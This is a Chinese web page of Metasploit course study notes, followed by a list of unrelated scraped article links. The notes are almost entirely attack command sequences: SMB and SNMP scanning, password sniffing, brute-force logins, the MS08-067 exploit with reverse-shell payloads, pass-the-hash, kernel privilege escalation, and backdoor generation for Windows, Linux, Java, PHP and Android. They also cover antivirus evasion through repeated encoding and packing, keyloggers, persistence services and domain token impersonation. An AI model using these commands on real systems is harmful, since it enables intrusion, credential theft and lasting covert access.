-----------------第一季--------------------

启动Metasploit:msfconsole

升级和更新:./msfupdate

直接退出:exit 退回上一级:quit

1.端口扫描:

a.调用Nmap扫描

nmap -v -sV ip

b.调用msf模块扫描(1)

 use auxiliary/scanner/portscan/syn

 show options

 set INTERFACE 网卡

 set PORTS 端口

 set RHOSTS IP/24 (24是网路遮罩, 因为ipv4全长32个bit, 所以32-24=8, 也就是遮罩大小为2的8次方, 也就是256个ip可以使用)

 set THREADS 100

 run

2.SMB扫描_获取系统信息

 msfconsole

 use auxiliary/scanner/smb/smb_version

 show options

 set RHOST IP

(假如ip是192.168.1.1,要扫描多个ip可以set RHOS 192.168.1.1-200)

 set THREADS 10

 run

3.服务识别(ssh)

 msfconsole

 use auxiliary/scanner/ssh/ssh_version

 show options

 set RHOST IP

 run

服务识别(FTP)

 use auxiliary/scanner/ftp/ftp_version

 show options

 set FTPUSER

 set RHOST IP

 run

4.密码嗅探

 msfconsole

 use auxiliary/sniffer/psnuffle

 show options

 run

5.SNMP扫描与枚举

 msfconsole

 search snmp

 use auxiliary/scanner/snmp/snmp_login

 show options

 set RHOST IP

 set THREADS 10

 run

 use auxiliary/scanner/snmp/snmp_enum

 set RHOST IP

 set THREADS 10

 run

6.SMB登陆验证

 msfconsole

 use auxiliary/scanner/smb/smb_login

 show options

 set RHOST IP

 set SMBUser administrator

 set THREADS 100

 run

7.VNC身份验证

 msfconsole

 use auxiliary/scanner/vnc/vnc_none_auth

 show options

 set RHOST IP

 set THREADS 100

 run

8.WMAP Web扫描(http://www.2cto.com/article/201312/266601.htmls)

 msfconsole

 load wmap

 wmap_sites

 wmap_sites -a url

 wmap_sites -l

 wmap_targets -h

 wmap_targets -t url

 wmap_targets -l

 wmap_run -h

 wmap_run -t 

---------------第二季--------------
1.远程代码执行

 msfconsole

 search 08-067

 use exploit/windows/smb/ms08_067_netapi

 show options

 set RHOST IP

 show payloads

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST ip

 info(查看影响版本)

 用nmap查看目标服务器版本

 set target 编号

 show options(检查是否已经设置好)

 exploit

 shell

 net user admin admin /add

2.MJDJ文件解析远程代码执行

 msfconsole 

 search12-004

 use exploit/windows/browser/ms12_004_midi

 show options

 set SRVHOST IP

 exploit

 set URIPATH /

 show options

 set LPORT 1244

 show options

 exploit

 sessions

 sessions -i id

 

3.口令安全

 msfconsole

 serach msql_login(ssh_login,ftp_login)

 use auxiliary/scanner/mysql/mysql_login

 set RHOST IP

 set USERNAME root

 set PASS_FILE 字典路径

 set THREAD 50

 set options(check)

 exploit

4.hash值传递渗透

(相关文章_实例解析通过Metasploit来传递哈希值:http://netsecurity.51cto.com/art/201009/227795.htm)

 msfconsole

 use/windows/smb/psexec

 show options

 set RHOST IP

 set SMMBUSER 帐号

 show options

 exploit

 hashdump(获取hash值)

 exit

 set smbpass hash

 exploit

5.NDP内核提权

前提:必须有一个session

 serarch 14-002

 use  exploit/windows/local/ms_ndproxy

 show options

 set session 1(id)

 show options

 exploit

提权:getsystem

6.多种后门的生成
a.windows后门的生成

 msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=端口 X >123.exe

 search handler

 use exploit/mulit/handler

 show options

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 set LPORT 端口

 点击123.exe

b.linux后门的生成

 msfpayload linux/x86/shell_reverse_tcp LHOST=IP LPORT=端口 X >linux

 chmod 777 linux

 ls

 ./linux

c.java后门的生成

 msfpayload java/meterpreter/shell_reverse_tvp LHOST=IP LPORT=端口 W >123.jar

 

d.php后门的生成

 msfpayload java/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R | msfencode -e php/baes64 -t raw -o 123.php

上传到目标站-本地监听-目标访问服务器

e.安桌后门的生成

 msfpayload android/meterpreter/shell_reverse_tcp LHOST=IP LPORT=端口 R >1.apk

 目标运行1.apk

 本地监听

 

7.内网渗透

获得shell扫描c段

 run get_local_subnets 获取网卡

 run autoroute -s ip 扫描c段

劫持域管理

 use incognito

 impersonate_token 域

 shell

-----------------------

 use auxiliary/sniffer/psnuffle

 run

 

8.反反病毒(免杀)

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai - t exe>123.exe

------------------------------------------------------------------------------

 msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -e x86/shikata_ga_nai -c 10 - t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe

-------------------------------------------------------------------------------

msfpaylad windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R| msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai - k -c 10

-----------------------------------------------------------------

upx -5 /1231.exe 加壳

 

9.不一样的xss(键盘记录)

 msfconsole

 search keylogger

 use auxiliary/server/capture/http_javascript_keyloger

 show options

 set DEMO true

 set URIPATH /

 set srvport 80

 run

10.维持访问

 msfconsole

 use exploit/multi/handler

 set payload windows/meterpreter/reverse_tcp

 show options

 set LHOST IP

 SET LPORT 1111

 run

 run metsvs -A

-------------------------------------------

 use exploit/multi/handler

 set payload windows/meterpreter/metsvs_bind_tcp

 show options

 set LPORT 31337

 set RHOST IP

 exploit

 keyscan_start(键盘记录)

 keyscan_dump

羽翼metasploit第一,二季学习笔记的更多相关文章

  1. 《Linux内核设计与实现》 第一二章学习笔记

    <Linux内核设计与实现> 第一二章学习笔记 第一章 Linux内核简介 1.1 Unix的历史 Unix的特点 Unix很简洁,所提供的系统调用都有很明确的设计目的. Unix中一切皆 ...

  2. 《java编程思想(第四版)》第一二章学习笔记

    目录 一.Introduction 1.抽象过程 2.面向对象语言(包括Java)的五个基本特性 3.每个对象都提供服务 4.public.private.protected三者的区别 5.Java的 ...

  3. 《Linux内核设计与实现》第一、二章学习笔记

    <Linux内核设计与实现>第一.二章学习笔记 姓名:王玮怡  学号:20135116 第一章 Linux内核简介 一.关于Unix ——一个支持抢占式多任务.多线程.虚拟内存.换页.动态 ...

  4. 毕业设计 之 二 PHP学习笔记(一)

    毕业设计 之 二 PHP学习笔记(一) 作者:20135216 平台:windows10 软件:XAMPP,DreamWeaver 一.环境搭建 1.XAMPP下载安装 XAMPP是PHP.MySQL ...

  5. 学习笔记(三)--->《Java 8编程官方参考教程(第9版).pdf》:第十章到十二章学习笔记

    回到顶部 注:本文声明事项. 本博文整理者:刘军 本博文出自于: <Java8 编程官方参考教程>一书 声明:1:转载请标注出处.本文不得作为商业活动.若有违本之,则本人不负法律责任.违法 ...

  6. VBA二次学习笔记(1)——文件操作

    说明(2018-9-1 11:20:46): 1. 上班三个月了,累的一逼,真的是钱少事多离家远,每天早上六点起,晚上八点回.哎,少壮不努力啊! 2. 三个月没写博客了,上一篇已经是5.29的了,真的 ...

  7. 《Linux命令行与shell脚本编程大全》 第一、二章 学习笔记

    第一章:初识Linux shell Linux内核负责以下4个主要功能: 1.系统内存管理 2.软件程序管理 3.硬件设备管理 4.文件系统管理 1.系统内存管理 内核不仅管理服务器上的可用物理内存, ...

  8. 《Linux内核设计与实现》 第一、二章学习笔记

    第一章 Linux内核简介 一.Unix 1.Unix的特点 简洁 绝大部分东西都被当做文件对待.这种抽象使对数据和对设备的操作都是通过一套相同的系统调用借口来进行的:open(),read(),wr ...

  9. 《Linux内核设计与实现》第一二章读书笔记

    第一章 Linux内核简介 1.Unix简介 (一)概念:支持抢占式多任务.多进程.虚拟内存.换页.动态链接和TCP/IP网络的现代化操作系统. (二)Unix特点(层次化结构): Unix很简洁,仅 ...

随机推荐

  1. 《More Accurate Question Answering on Freebase》文献笔记

    bast-2015-CIKM CIKM全称是International Conference on Information and Knowledge Management 这篇文章主要采用采用lea ...

  2. 运行pytorch代码遇到的error解决办法

    1.no CUDA-capable device is detected 首先考虑的是cuda的驱动问题,查看gpu显示是否正常,然后更新最新的cuda驱动: 第二个考虑的是cuda设备的默认参数是否 ...

  3. HBase 笔记3

    数据模型 Namespace 表命名空间: 多个表分到一个组进行统一的管理,需要用到表命名空间 表命名空间主要是对表分组,对不同组进行不同环境设定,如配额管理  安全管理 保留表空间: HBase中有 ...

  4. TheFatRat一般使用

    利用它生成后门 第一种通常情况下速度很快,较稳定,但免杀效果极差 推荐使用第二种 免杀效果好,如下图 第一种是最新的模块,较免杀效果极好.还可伪造图标 第二种是旧的

  5. Vue系列之 => webpack基础使用

    webpack安装方式 1,运行 npm i webpack -g 全局安装. 2,在项目根目录中运行 npm i webpack --save-dev 安装到项目依赖中 项目目录 进入src运行, ...

  6. Solution about MB STAR C4, MB STAR C5 Update and can not test vehicles problems

    Solution about MB Star C4, MB Star C5 Update and can not test vehicles problems 1. Make sure your co ...

  7. linux 安装nginx+php+mysql

    http://www.cnblogs.com/kyuang/p/6801942.htmlnginx安装 本文是介绍使用源码编译安装,包括具体的编译参数信息. 正式开始前,编译环境gcc g++ 开发库 ...

  8. centos7救援模式--rescue模式

    前序 经典问题:系统无法进入,如grub损坏或某个配置文件改错 操作 1 按方向键到Boot,选到Hard Driver,按减号,使其下移,最终让CD-ROM Drive到第一行,并按F10保存 2 ...

  9. docker启动容器报错: could not synchronise with container process: not a directory

    错误现象 在运行容器时,出现以下错误 [root@localhost test]# docker run -it -d -v $PWD/test.txt:/mydir mytest fd44cdc55 ...

  10. 修改SS配置文件使其同时支持IPV4和IPV6网络

    将/etc/shadowsocks-libev/config.json文件中的 "server":"0.0.0.0", 修改为: "server&qu ...